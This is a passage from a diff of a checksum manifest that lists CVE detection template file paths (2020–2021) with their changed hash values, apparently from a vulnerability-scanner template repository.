+http/cves/2020/CVE-2020-8115.yaml:5783f92b5ccedceb0c259e03cca80fd47053a915 +http/cves/2020/CVE-2020-8163.yaml:f470d2d3016a962f7ec590d77b19a43f6acadb88 +http/cves/2020/CVE-2020-8191.yaml:6ed1e734ec2ee564f2b11700bc59380222121485 +http/cves/2020/CVE-2020-8193.yaml:c730b189267de57e03a336d73fda9c22c435b30e http/cves/2020/CVE-2020-8194.yaml:1799ec8f9624c47809dedd73f5a2d22aaa20f638 http/cves/2020/CVE-2020-8209.yaml:d5a138aa97863d4074fe218b3049f7791fb81ab9 -http/cves/2020/CVE-2020-8497.yaml:d50899731199c0c1938709b0e5a9d6576a542543 -http/cves/2020/CVE-2020-8512.yaml:07b638a4ae7db2a3f6c3ffbb48704bb6a9a0d828 -http/cves/2020/CVE-2020-8515.yaml:7fa503f9ede1cebdf0def1ab5e9200f931866ef4 -http/cves/2020/CVE-2020-8615.yaml:60e99101d1611bccf4a625fb1684dbbdd94217be -http/cves/2020/CVE-2020-8641.yaml:87d4b65a1ce6656f16db7df50b851e1d68f7cfd7 -http/cves/2020/CVE-2020-8644.yaml:ee6ee536cd78dd7df3e019f8cf15e9390ac91be3 +http/cves/2020/CVE-2020-8497.yaml:cdb905b1cb4a6db55e8a6da868be8a91f09d33d6 +http/cves/2020/CVE-2020-8512.yaml:4a6489520aee40a14b3f2c70b30a28b209ee05d1 +http/cves/2020/CVE-2020-8515.yaml:60a9f0e5cf482b2abf522834d95875baf33f29ac +http/cves/2020/CVE-2020-8615.yaml:f4732edfed404f9be43debf22e295605eab2e532 +http/cves/2020/CVE-2020-8641.yaml:8d361c6ac6ea6a97bc24fbe5a8e69df0cf5ff73a +http/cves/2020/CVE-2020-8644.yaml:08ca5cfa9de25d11eff7521ad38f5279e686c141 http/cves/2020/CVE-2020-8654.yaml:86969023c0fb1d0f7e502880eb4ead28b3b5cd5d http/cves/2020/CVE-2020-8771.yaml:fdbf80c1219ed77aa813cdea75224fc0e0437e11 -http/cves/2020/CVE-2020-8772.yaml:7f882131550398901bee34a3f5ad985c4d6edfbb -http/cves/2020/CVE-2020-8813.yaml:312c01ad563809b3d15c5b3bf351a5e5955dc008 -http/cves/2020/CVE-2020-8982.yaml:a1c3b9f3206b71851d546ae3524b20fc25835f94 -http/cves/2020/CVE-2020-9036.yaml:bd3242d043e8aa13663d87d414aae3de5fb485ba +http/cves/2020/CVE-2020-8772.yaml:b6fec3222c262217a8cf5bba125b4298ebe5c279 +http/cves/2020/CVE-2020-8813.yaml:9eb88a961a0eacb2e81e33e6cf79ac190a2bf1f6 +http/cves/2020/CVE-2020-8982.yaml:01d3456ee84b4be1c04f9a48fdf3e521ea32ba80 +http/cves/2020/CVE-2020-9036.yaml:8f1109d1da947a0ad8562a105d79c5933d0db5cb http/cves/2020/CVE-2020-9043.yaml:849faa887c73b1638d4f68a403a21a320989a062 http/cves/2020/CVE-2020-9047.yaml:ef83a27c2edd3c2776b89c8bfdaec91d6e1ace59 http/cves/2020/CVE-2020-9054.yaml:c9e18ac60edbecec09d912db77f833b45b70ed7c -http/cves/2020/CVE-2020-9315.yaml:0a59530d44f12702c60747c7b5aa06bca991c32a -http/cves/2020/CVE-2020-9344.yaml:db98ff60deb8b268c575bf4b8d2312a3a517a360 -http/cves/2020/CVE-2020-9376.yaml:ce3538b7b3c9e8080041e9719ca749031e1056ca -http/cves/2020/CVE-2020-9402.yaml:7b3d964c0f2ed4cea7475ed18f71172c171bb471 -http/cves/2020/CVE-2020-9425.yaml:648f9b42eebc009268de5474693749cadee112e3 +http/cves/2020/CVE-2020-9315.yaml:1900cca1d2d418d09656c586bc4718699fa72a12 +http/cves/2020/CVE-2020-9344.yaml:a89bced51c825a39641d826e6de466e04cedb222 +http/cves/2020/CVE-2020-9376.yaml:9136255705fdee1fea7913b09adaeb0cdfd83458 +http/cves/2020/CVE-2020-9402.yaml:398e68e2cbce9d105785e1d3cbd98056162eb439 +http/cves/2020/CVE-2020-9425.yaml:49b1c59803a7cc4378e6bfa690f375ad95855d10 http/cves/2020/CVE-2020-9483.yaml:b856b57a3c83f86b77fe655826d69410a2cff66c -http/cves/2020/CVE-2020-9484.yaml:bb643025fc1bb0b2de42da7158e1cf70093e0840 -http/cves/2020/CVE-2020-9496.yaml:ba585628d3f5c005c1aa634c4344b770821d6230 -http/cves/2020/CVE-2020-9757.yaml:bdbd5638a9f422f128feeed8281a980683cb1111 -http/cves/2021/CVE-2021-1472.yaml:d1b1e41c111e4320a66a15a2f405a48300618dce +http/cves/2020/CVE-2020-9484.yaml:a5952e10d76346826ec105f1e756ac44c270ee63 +http/cves/2020/CVE-2020-9496.yaml:85cf814c38c7240d6138f8f2969931e1c21589cc +http/cves/2020/CVE-2020-9757.yaml:1e71acf8ed2a354d230ed4b9f2c4683ce6a6a0cb +http/cves/2021/CVE-2021-1472.yaml:9fc6a2d166c5f4420df34e0797fe64cb79ce5ecd http/cves/2021/CVE-2021-1497.yaml:8e4e8691b05b2e3003f544dba1dd82e9d0469977 -http/cves/2021/CVE-2021-1498.yaml:c630664a2b59cabcbb5f213a099df9ba4b229683 -http/cves/2021/CVE-2021-1499.yaml:bf9c05ab6320c875a9addc9f91a59665a173a280 -http/cves/2021/CVE-2021-20031.yaml:fcee5c484b93dc955534fab6342aef46c47ee2a4 +http/cves/2021/CVE-2021-1498.yaml:f77f639b7bd67b05d7e4aae346e07a35bb1515bd +http/cves/2021/CVE-2021-1499.yaml:4cfb5a4971a96a3ea7449540cd2a674f8c416f3b +http/cves/2021/CVE-2021-20031.yaml:2a1693e374980b54e233b120122f40613907a67b http/cves/2021/CVE-2021-20038.yaml:7167a6c38c9fde66a10e0146a4d0d470fa64c37f http/cves/2021/CVE-2021-20090.yaml:492bf1d4e71155f00ea4caff43a2ed3bd18991cf -http/cves/2021/CVE-2021-20091.yaml:acda7214538f03012e8749fcccc3fdef02be0e18 +http/cves/2021/CVE-2021-20091.yaml:1da951bf5a65bfe6f2a7704de42df7a91bd73b3c http/cves/2021/CVE-2021-20092.yaml:cafad84bd12f41f09da4a823b1b68585a5e63051 -http/cves/2021/CVE-2021-20114.yaml:56c858fb0b43e28abcff788f9c95861c14e8754d -http/cves/2021/CVE-2021-20123.yaml:028e72704112e159c4705ca34fb017fafd5850f9 -http/cves/2021/CVE-2021-20124.yaml:b74032f260a4144131f377cf8c302e9e5502930c -http/cves/2021/CVE-2021-20137.yaml:329f5003851ff0115bb2c57bdb3ef3d2cc798fd6 -http/cves/2021/CVE-2021-20150.yaml:e91b3bf2efe60e6c5c828010cc1f2bfee24d02e2 -http/cves/2021/CVE-2021-20158.yaml:1e9379b02533bc87ce8346b3692f541e864eb987 -http/cves/2021/CVE-2021-20167.yaml:cf0786884661d7cd896a4baeead0c509cf488448 -http/cves/2021/CVE-2021-20323.yaml:c706258b1f2b4c2d50d11104f817d2d7c9832064 -http/cves/2021/CVE-2021-20792.yaml:1134c3811e5f3ce90ddf56ba50363e9540c698ff -http/cves/2021/CVE-2021-20837.yaml:54787f4213f6a7a69e7ab1f253daa75823acdc86 -http/cves/2021/CVE-2021-21087.yaml:0926472430cb913df5560b207a233dba27bcdbb8 -http/cves/2021/CVE-2021-21234.yaml:d1ed5df584a1a449c5f7dcc1212969b288eee8a3 -http/cves/2021/CVE-2021-21287.yaml:c8f72f297f3cebba558775e599d82fae0eef72d5 -http/cves/2021/CVE-2021-21307.yaml:708322a0156240c58bde0e08efde0eb3c63b61be -http/cves/2021/CVE-2021-21311.yaml:49c07df35ce3f1b27711d1b11ac1dde8bcee4241 +http/cves/2021/CVE-2021-20114.yaml:aefc50a43542667e567e801325efdfb7160044ad +http/cves/2021/CVE-2021-20123.yaml:c518f9a5a37e85cfe1c46b32ca52e73c0692747b +http/cves/2021/CVE-2021-20124.yaml:abb973e39dd6f5dce5d12dcc4ad33f22e689a4e1 +http/cves/2021/CVE-2021-20137.yaml:0daaa379a978d0428366623ff2aef851212c9f21 +http/cves/2021/CVE-2021-20150.yaml:075cd5dda8786ace5a3df71e55bdf025602c91da +http/cves/2021/CVE-2021-20158.yaml:e7060d25815d287630f615da2bc2bc16797cf003 +http/cves/2021/CVE-2021-20167.yaml:18e9d41d4ccf3a94d4037bd1b023ee8b13a38f7e +http/cves/2021/CVE-2021-20323.yaml:00fb4bd0630e78aa9c940d8eca1feae7081f925f +http/cves/2021/CVE-2021-20792.yaml:35ff7b8aad2ef0641a3118a0ac5943a40b7ce110 +http/cves/2021/CVE-2021-20837.yaml:5779476dc1adc4d80f2ebcc5c85323117c40f6a4 +http/cves/2021/CVE-2021-21087.yaml:b4a4f6e73ea548e793410fa0833fa9ddddbb2271 +http/cves/2021/CVE-2021-21234.yaml:3bebd96604bdc88a51c32a98c2b2bb9ecba0966a +http/cves/2021/CVE-2021-21287.yaml:55c45e7817d18159e21800f1e1794f26c86cdd3d +http/cves/2021/CVE-2021-21307.yaml:a058a2356df9e6607e9f8ae975812945caee9873 +http/cves/2021/CVE-2021-21311.yaml:0154798d24b10664dd98db0008b371a50f227d61 http/cves/2021/CVE-2021-21315.yaml:70406f1f801ca874413f322d2961c79a8754fb7f http/cves/2021/CVE-2021-21345.yaml:512607ead259d98de98ba7711800d5198a0aa819 -http/cves/2021/CVE-2021-21351.yaml:9146711bbec2428b87492f9dfb27cf96571cd0e0 -http/cves/2021/CVE-2021-21389.yaml:5697547e1529a51c0afeff22cf019ebfec6cf04d -http/cves/2021/CVE-2021-21402.yaml:0a42f04d55aa5eda68d49c3cc6f65ec4afb1ba6f +http/cves/2021/CVE-2021-21351.yaml:8e68e655d6102eb88dd246bfb3561d50ebf1eafd +http/cves/2021/CVE-2021-21389.yaml:a0f10bdb842da5078c37a9afacd6a602c0732546 +http/cves/2021/CVE-2021-21402.yaml:e64c2bf5425996ff22209077460cc2413d15aa9d http/cves/2021/CVE-2021-21479.yaml:6576b05e5abc8d3992d561c5217251883e27d8ca -http/cves/2021/CVE-2021-21745.yaml:7feb1570c2126860efa23bdac1a58d2b58a65684 -http/cves/2021/CVE-2021-21799.yaml:4464d72b3dd679910ef105f2ef9b8b5d6e4a4971 -http/cves/2021/CVE-2021-21800.yaml:b76cd8a9f31341a8b260e83e46698129a977ab53 -http/cves/2021/CVE-2021-21801.yaml:f64b9221773cc64fb581df2f4f210e1fb36cb932 -http/cves/2021/CVE-2021-21802.yaml:1edfedd9a2ed38e9b05b9d70505c1e5ac3287042 -http/cves/2021/CVE-2021-21803.yaml:3e9cbe6e737795f4cb639896ba89ec9181f88c53 -http/cves/2021/CVE-2021-21805.yaml:d8ccf425e42057a5f8d4877ab7dcc1fc1dd1101c +http/cves/2021/CVE-2021-21745.yaml:da13fdae366d46db22003811aea9e87376765b7f +http/cves/2021/CVE-2021-21799.yaml:0fe83549d591a70959d82ae6cd8e487286176d5a +http/cves/2021/CVE-2021-21800.yaml:14ccc1c341b59710236dfafec5ff26f606a95d84 +http/cves/2021/CVE-2021-21801.yaml:940ff78b6102645d3a0f528bb0521b958e225031 +http/cves/2021/CVE-2021-21802.yaml:b858969ae45c1ae53fbbf227e63415f6b6b1a06e +http/cves/2021/CVE-2021-21803.yaml:2ef3cf3a7031fe7de22e837cec7fab43ddd43fca +http/cves/2021/CVE-2021-21805.yaml:eb1766b4e6c62d3ff6829821a5e944d1bb21babc http/cves/2021/CVE-2021-21816.yaml:520bc9b9b2480f3d3745af02a4a646d3cc95a1bb http/cves/2021/CVE-2021-21881.yaml:314c6a82741362db622de79002bdaaa699d77761 http/cves/2021/CVE-2021-21972.yaml:3cb1d3e5a750dee527ad05a5dde9606adf3534da http/cves/2021/CVE-2021-21973.yaml:853e9759bf3850a3c10bf2d32c0817837c5a9296 http/cves/2021/CVE-2021-21975.yaml:7f5af74dfddf9aad00a337757a5d13c48d2e32a5 -http/cves/2021/CVE-2021-21978.yaml:0b85fe6b593abe4842dcee884c102b70e77b1082 +http/cves/2021/CVE-2021-21978.yaml:a4ca0080ca54e4fb2dd60df5a9b22016d5dc35c9 http/cves/2021/CVE-2021-21985.yaml:de275a6d1f73b71650461305255ce4033fb0f6c3 -http/cves/2021/CVE-2021-22005.yaml:4d60e11bb24e7646d6e594e555473e749eac2a06 -http/cves/2021/CVE-2021-22053.yaml:9349ec3ab506e0c4e2b2b9fb25d28fb8b6ce977d -http/cves/2021/CVE-2021-22054.yaml:9fb80f3816afec6b9f870dd2f8fd806643e4e834 -http/cves/2021/CVE-2021-22122.yaml:f2f6bb0ddb5ece77618aa0a30365b2b311c40234 -http/cves/2021/CVE-2021-22145.yaml:6a0c3e42ebe2d8aafb61acc9a7b8dae2b4a6d4d1 -http/cves/2021/CVE-2021-22205.yaml:9e49c70f067bba5a2e7eeed24798245c195838f6 -http/cves/2021/CVE-2021-22214.yaml:98b7cc80571479e1538bbadd78907e8ad821bdff +http/cves/2021/CVE-2021-22005.yaml:fe325a40c57f48bb4882a1fd996574deeb165879 +http/cves/2021/CVE-2021-22053.yaml:d8208a8a3043a154e1a4fe7f8509addc209f8875 +http/cves/2021/CVE-2021-22054.yaml:c1b2c935bc6b3a81302c81bfa50c0f6223aa1b1f +http/cves/2021/CVE-2021-22122.yaml:07ca11d8042ad99ed5aa7c541c736b1402fd7a5d +http/cves/2021/CVE-2021-22145.yaml:b4f6a6a818fbd74362c332552aabcf5bad37a688 +http/cves/2021/CVE-2021-22205.yaml:3bc9cd57d614ef6a973445c42055cf5697201c94 +http/cves/2021/CVE-2021-22214.yaml:7064fb2447f553a11ac940d7873755f0a31d2bcd http/cves/2021/CVE-2021-22502.yaml:0222d90f5cb9381a29406ba64373c7a401ddaf0f -http/cves/2021/CVE-2021-22707.yaml:ea74ca24fcbceee325d017fa9214571d11240d80 -http/cves/2021/CVE-2021-22873.yaml:5beb5f7420b748951d79cb8fbac8a27fc281488a -http/cves/2021/CVE-2021-22911.yaml:048be356528c7c29a31ac1ac3281292f1b07c0ba -http/cves/2021/CVE-2021-22986.yaml:06a290cbb4d4bafb585a68270201fe178561c9e2 +http/cves/2021/CVE-2021-22707.yaml:5f16e2f4524a176ad6521e6b3d80e5533447c44d +http/cves/2021/CVE-2021-22873.yaml:88b0b5dd1d60b31f5bb752d3931fd07e8bdf72c3 +http/cves/2021/CVE-2021-22911.yaml:6de8d0845adb4ef46c6447a4326a35cc946dd823 +http/cves/2021/CVE-2021-22986.yaml:31f5e400fc950bc34cf66eca3460919816e6f71c http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 -http/cves/2021/CVE-2021-24145.yaml:a82b4e67bfbd496b6ce1b0d8378f81dacd5a0af2 +http/cves/2021/CVE-2021-24145.yaml:e6e82aec5f5af7635fb64950a94cc6b5ede67c28 http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed http/cves/2021/CVE-2021-24155.yaml:fc725c5de1693bf4594d37b2b83d936127f2ff94 -http/cves/2021/CVE-2021-24165.yaml:04c032423eb748616d2611c0439257bbd9284bb7 -http/cves/2021/CVE-2021-24169.yaml:3b378862db16225c42dcb88825dbb95e4b2c8fcc +http/cves/2021/CVE-2021-24165.yaml:cf99607da08b31da4b450f3c79ab66d2a78f4270 +http/cves/2021/CVE-2021-24169.yaml:6ab7986da54e496ed7901604980a6b62e95d0540 http/cves/2021/CVE-2021-24176.yaml:08064c398c90c5743dcd737492b44532ad8ae609 http/cves/2021/CVE-2021-24210.yaml:f3c92e19e3e4ecb701c23031ba681bc0bebbed93 -http/cves/2021/CVE-2021-24214.yaml:121189d0c2b9ce9daeb511e05c4ba18da2da9cd2 -http/cves/2021/CVE-2021-24215.yaml:fd49e8ca44ef839c651006537212074a832aeafc +http/cves/2021/CVE-2021-24214.yaml:373a596e522804f9a9997fff30ef0f2acf94cc66 +http/cves/2021/CVE-2021-24215.yaml:37ab6917498b5938e472925d78a9ffc51df8ef4b http/cves/2021/CVE-2021-24226.yaml:e3cce68f878058a5b883337446b715c4638ea5b2 -http/cves/2021/CVE-2021-24227.yaml:d825309df0abf4a54318fc13a1fa1ffb0896caaf -http/cves/2021/CVE-2021-24235.yaml:57c461d4f1161b23cc0275237347f99886ee2245 +http/cves/2021/CVE-2021-24227.yaml:9a69a16794dbe8c405cb180f644fdfc4905907e1 +http/cves/2021/CVE-2021-24235.yaml:3cebd4f0ff47c09aa044f04f2a2a5556a270c627 http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 -http/cves/2021/CVE-2021-24237.yaml:ee414764403594d1eb17e3c75248f7981be30647 -http/cves/2021/CVE-2021-24239.yaml:3ba11b811447f546d379ae433df958844f08df7b +http/cves/2021/CVE-2021-24237.yaml:3b933f6017ed933c7dd0e2bdb009e8a4380007fc +http/cves/2021/CVE-2021-24239.yaml:8675928c6b117809c4be9f080f0e3b90d3805e31 http/cves/2021/CVE-2021-24245.yaml:7bb1fc8f1f066614f4acc1287336318999c2b9ab http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 -http/cves/2021/CVE-2021-24275.yaml:d1acccef3badf246eeb435791fd2b6f5a226f539 -http/cves/2021/CVE-2021-24276.yaml:5b68df559fa465a4f8e22f0166773c8a8d53f469 -http/cves/2021/CVE-2021-24278.yaml:7837831aa12b4bb256ff897217417829bf146f1c +http/cves/2021/CVE-2021-24275.yaml:a1a605d2709c989d4b282a55c7b6420cb93f6f41 +http/cves/2021/CVE-2021-24276.yaml:14ab150dfbb0d9e69f444b87617e45e5d7c85fba +http/cves/2021/CVE-2021-24278.yaml:d0911c2e74a071f6ed35ec02836ae6f952343772 http/cves/2021/CVE-2021-24284.yaml:8e0a2d867fefe5278478906204c54407d2c52981 -http/cves/2021/CVE-2021-24285.yaml:7be3795857e1e167e9cadb6ba89f1404ceedd3db -http/cves/2021/CVE-2021-24286.yaml:feed87a979080f2b9a28d592ceace161b1f5fffd -http/cves/2021/CVE-2021-24287.yaml:b226b9989d0add703e9f949168ac27a5f4063f96 -http/cves/2021/CVE-2021-24288.yaml:78780d0e5af16199bd2f7030bf0064a359c23855 -http/cves/2021/CVE-2021-24291.yaml:d0aa7463cec83fe146221a59d2c3746bfa5ff495 +http/cves/2021/CVE-2021-24285.yaml:c25f3c43e4dacddb0dbec3562d7a32f46f09a59c +http/cves/2021/CVE-2021-24286.yaml:28e87a794c7aed34e30970461c7d6f4d5f9ca3cc +http/cves/2021/CVE-2021-24287.yaml:116274ad6f0c3249da6aed5bcf9662462615b117 +http/cves/2021/CVE-2021-24288.yaml:fb8bb41722f495b69d91278ed06ea186c2aa2fb4 +http/cves/2021/CVE-2021-24291.yaml:dad4f96eb0c16f1545431c9df93842305f26a1ae http/cves/2021/CVE-2021-24298.yaml:ed0a99a0ae34549d1ba0cc1d1fc655a059ed6085 http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 -http/cves/2021/CVE-2021-24316.yaml:98172efa234e09a71c0e52c75fa2ad1da06fe01f -http/cves/2021/CVE-2021-24320.yaml:c4abb3477ab9762de61ad0cea25f1a7355e501f8 +http/cves/2021/CVE-2021-24316.yaml:e878005065bf4b6e222377ee880aef14d3342ebb +http/cves/2021/CVE-2021-24320.yaml:064d8840bd23e0bd74eee232616d5b3395229aef http/cves/2021/CVE-2021-24335.yaml:7e6548d5b8fd76c6cf9ebb4af47dd7f563999e1a -http/cves/2021/CVE-2021-24340.yaml:c3fcf4701be3f06962cc6517495e829956d48535 +http/cves/2021/CVE-2021-24340.yaml:56f924a33ea2e02a7da8c72d8a98eae01d8286dd http/cves/2021/CVE-2021-24342.yaml:45cf70e75e4e37166296cc7d2db4eee6b266a111 -http/cves/2021/CVE-2021-24347.yaml:603b7a6f61ca06c0ec6fb28228e7acdb922efce5 -http/cves/2021/CVE-2021-24351.yaml:06a47bf975372ca45adff762da99a08b0fdb05b4 -http/cves/2021/CVE-2021-24358.yaml:1a634c2b45c62248b4ad9a3b343e5a1e9b5cb648 +http/cves/2021/CVE-2021-24347.yaml:a7b198fb418307f63ca9acf33e682de27d972f5f +http/cves/2021/CVE-2021-24351.yaml:5c8ef0e8c6bc5f6b7d9af51dcb39649fe73c975a +http/cves/2021/CVE-2021-24358.yaml:16d1d4314449c6b068c33c2130e3fcb0db7f165c http/cves/2021/CVE-2021-24364.yaml:462271144765c14ca8788b33496a643d7ff7dcf3 http/cves/2021/CVE-2021-24370.yaml:480c194476d40e71e0f58139dbac79cfcca559ba http/cves/2021/CVE-2021-24387.yaml:9d10f02a47e4a06f90f4f06a24f24e6177b962ec http/cves/2021/CVE-2021-24389.yaml:42ad59611f74158ae872570a997c48530f1b987f http/cves/2021/CVE-2021-24406.yaml:619168311788c421c9975c3b5285c06ade2c2dd7 http/cves/2021/CVE-2021-24407.yaml:1f40116c29a201347b75897f4ae36497de80c72a -http/cves/2021/CVE-2021-24409.yaml:17dbcd3cbc26cd1e7c1127e9d1a17e36ee8e7197 -http/cves/2021/CVE-2021-24435.yaml:4c9854d4be1ecd0bc0935ce161352a2301f68d8c +http/cves/2021/CVE-2021-24409.yaml:2d79942f20f2565635b069191b9faf3ecc4e48ce +http/cves/2021/CVE-2021-24435.yaml:15387d29390d1ec6a1c5fb8f054dd823a10cef2f http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:5e257a18bef0eeb7e79d93772aa8889139f87747 +http/cves/2021/CVE-2021-24442.yaml:03047b68e4fab0c5aee20d5c8daeb94e7ec7045c http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a -http/cves/2021/CVE-2021-24472.yaml:619b8e42c91130942587995b934b9f6cc591faee +http/cves/2021/CVE-2021-24472.yaml:4dcca0eca6199a7b117013f82857bc7bd951533f http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 -http/cves/2021/CVE-2021-24495.yaml:a12f27c95cce7beea89646d84b37f514056883cd -http/cves/2021/CVE-2021-24498.yaml:19c1037c1be634ce077d5e4bacc4eb8de8eff0bc +http/cves/2021/CVE-2021-24495.yaml:9776ce8d7642c38c752b5277411ae5ffd5d822f8 +http/cves/2021/CVE-2021-24498.yaml:e68e97cd91a0f778434094f485c1a13259df7149 http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 -http/cves/2021/CVE-2021-24510.yaml:8c7148382e6ee611f343cf28583c3bb7b4e0ee7a -http/cves/2021/CVE-2021-24554.yaml:d81b4b96eb5938723fef5c8b4ff3c6b714601a31 -http/cves/2021/CVE-2021-24627.yaml:430e5307771ec9c27cfbd2e8cd9850414e7aff0f -http/cves/2021/CVE-2021-24647.yaml:c120dcd315b69a16a6283e0aa494712ed21ec48c +http/cves/2021/CVE-2021-24510.yaml:ba66a091f2fa2c173e0cde1cbcb0c7e7e412f462 +http/cves/2021/CVE-2021-24554.yaml:3d14e85b29d926a1bfdd0408646468592755c2e4 +http/cves/2021/CVE-2021-24627.yaml:d08981841f2aadf45be7bfb2b624c740287bb846 +http/cves/2021/CVE-2021-24647.yaml:57e0c23fd8a53f4853ebd1bd8784bbd17ff174f1 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac -http/cves/2021/CVE-2021-24731.yaml:202d1b9b3252ed7985d888b8e5283366e2283c91 -http/cves/2021/CVE-2021-24746.yaml:3d2a0e78462718157b6447e2dd99377085a8513b -http/cves/2021/CVE-2021-24750.yaml:a5f2bf989b1fab3e654b921557278cb5738f2a37 +http/cves/2021/CVE-2021-24731.yaml:3fb74c68ec27217782f13c9dcd2cbdcec90de59b +http/cves/2021/CVE-2021-24746.yaml:e817bdd5678f8a761303e95377fa9fd8c49bd351 +http/cves/2021/CVE-2021-24750.yaml:9a94ffcf36a259a6cd2de100ccdb877dd33b1619 http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 -http/cves/2021/CVE-2021-24838.yaml:0cc51d4d1c10c2f4af870aa9b636013be8130a28 -http/cves/2021/CVE-2021-24849.yaml:cf4dc11f4c272ed7159a418c8fec48d38bebc518 -http/cves/2021/CVE-2021-24862.yaml:c12546a4335f7196f4b2813946601c2f74e79cca -http/cves/2021/CVE-2021-24875.yaml:af4472bf9db8cc8423ae0c3b0ebe71c3767829bc -http/cves/2021/CVE-2021-24891.yaml:d25791df32146893bfb3dc68d5b0175a4a53e2ee +http/cves/2021/CVE-2021-24838.yaml:3e324388696bcd84d8cff8c5354abd28c3db3bcc +http/cves/2021/CVE-2021-24849.yaml:531bc837b67305d9b5488d191ab5bb1e88b9c8bd +http/cves/2021/CVE-2021-24862.yaml:18b88de1f2f004a26001bb93fc8072ec4f7a3372 +http/cves/2021/CVE-2021-24875.yaml:26b9421ad311a64c3696e1f27b6a87c2b2e64d8f +http/cves/2021/CVE-2021-24891.yaml:95ace65f00bc1b4f18f34b95b253c69f80192c35 http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 -http/cves/2021/CVE-2021-24915.yaml:6bcbcac03cdf23b16667b90d3aa28722558fa819 -http/cves/2021/CVE-2021-24917.yaml:ff3bab51dcfdb188e0827434b16640e438278c6a -http/cves/2021/CVE-2021-24926.yaml:57977ea4fe89af198eeecde8eae9bb63c6f40fd6 +http/cves/2021/CVE-2021-24915.yaml:8e2119bb3b35a4519c26947cf9e297ef976a134a +http/cves/2021/CVE-2021-24917.yaml:08f0ddeb207f275c090ca54b50434e696993b32b +http/cves/2021/CVE-2021-24926.yaml:ec83411f15a40fabfc7e893063d32fc7178a37dc http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 -http/cves/2021/CVE-2021-24940.yaml:3d017792835b350d26b0023c6a177f14324e7cb4 -http/cves/2021/CVE-2021-24943.yaml:5317340c8fb0b9a6fb64ba613a8648948c6a0ae6 -http/cves/2021/CVE-2021-24946.yaml:9da6cde41fdf8ae8495138ea90a92f416059221e -http/cves/2021/CVE-2021-24947.yaml:6a8cf48f029ac0263d8ac5c55b16d33fc0411d62 +http/cves/2021/CVE-2021-24940.yaml:9b94c2a20503d658ae777df0cdf3168f25a936fb +http/cves/2021/CVE-2021-24943.yaml:798239f2034a244734927cb4c21f1511289eb724 +http/cves/2021/CVE-2021-24946.yaml:a1b408e926b8579f4ba65ae73a1ab85d6962bb2d +http/cves/2021/CVE-2021-24947.yaml:5d64893847435d3bf297bf280f24791f4cd58c51 http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 -http/cves/2021/CVE-2021-24970.yaml:a184cc1dfb950bd077a82bf0fd556fa04fceb09c -http/cves/2021/CVE-2021-24979.yaml:844fa0496f0d95c411d24813296d2cd16472de35 +http/cves/2021/CVE-2021-24970.yaml:43003e6dd3a06352c96df0c73482095e8e95a683 +http/cves/2021/CVE-2021-24979.yaml:b5cad9deea201ca00b277758a544a75b35d45db3 http/cves/2021/CVE-2021-24987.yaml:06ec87f0d9dad1a08870b903b897645a4114cca6 http/cves/2021/CVE-2021-24991.yaml:4bc4eec76c21b3f68454f49c72adff65d3a817b5 http/cves/2021/CVE-2021-24997.yaml:1824a3b9d5a403431c731e636e0365e882b2e145 -http/cves/2021/CVE-2021-25003.yaml:8cf988dd1b3af7db4db432f71a28c1bfae849f1f -http/cves/2021/CVE-2021-25008.yaml:186b0b01951f649e4cdce8c031b3932b9db8f818 -http/cves/2021/CVE-2021-25016.yaml:b324539bafd7c8b4731831a526382f8240bfc1bf +http/cves/2021/CVE-2021-25003.yaml:a8d3634ad0c75055bb3d751f846e3a586e54e7ad +http/cves/2021/CVE-2021-25008.yaml:08a6fdd6b7c3c743fc1b023df5905a53e90348eb +http/cves/2021/CVE-2021-25016.yaml:13eca21533bf781856bc7ecd416bdd8abf804653 http/cves/2021/CVE-2021-25028.yaml:533752557ff220a1bd422d2fb856f1ffb91b9969 -http/cves/2021/CVE-2021-25033.yaml:f1fb5b88482121fb7fbcd103037c7f786140e8f1 -http/cves/2021/CVE-2021-25052.yaml:244570a7095d59bcd88ac48b88fd21fee21bd97b +http/cves/2021/CVE-2021-25033.yaml:418b528ea6c7886e28b79f4f7673c158e9216acb +http/cves/2021/CVE-2021-25052.yaml:76f2ab4b9468c2d95ef7165c8e45620ccd38e4fa http/cves/2021/CVE-2021-25055.yaml:f7703e52995b4903f92459e9ef95df26f9bed1a2 -http/cves/2021/CVE-2021-25063.yaml:028afc6144e0860af778b9b357617b0cb11eb9cc -http/cves/2021/CVE-2021-25065.yaml:6402c0d4528380b364f01e1c93d8a97e71459e96 -http/cves/2021/CVE-2021-25067.yaml:7a404629c90f4092f6c0371e7d71929fa1781695 +http/cves/2021/CVE-2021-25063.yaml:821b39a53a40c8ffa4ba2180a1ef6aefa92306d5 +http/cves/2021/CVE-2021-25065.yaml:11f959dceee9ebf18badd3b3a811dea7709bb1b1 +http/cves/2021/CVE-2021-25067.yaml:ed26c9fc4b409093178bf53f71c0269b444a6ed1 http/cves/2021/CVE-2021-25074.yaml:5a380fe97e9ed2a623bb5d9a76a78a9b9581a041 -http/cves/2021/CVE-2021-25075.yaml:a718dee47ee127c7e76cf3f6c61d0e902e499c06 -http/cves/2021/CVE-2021-25078.yaml:1de2dee76dcfd2b67a3a22434d17f20797354517 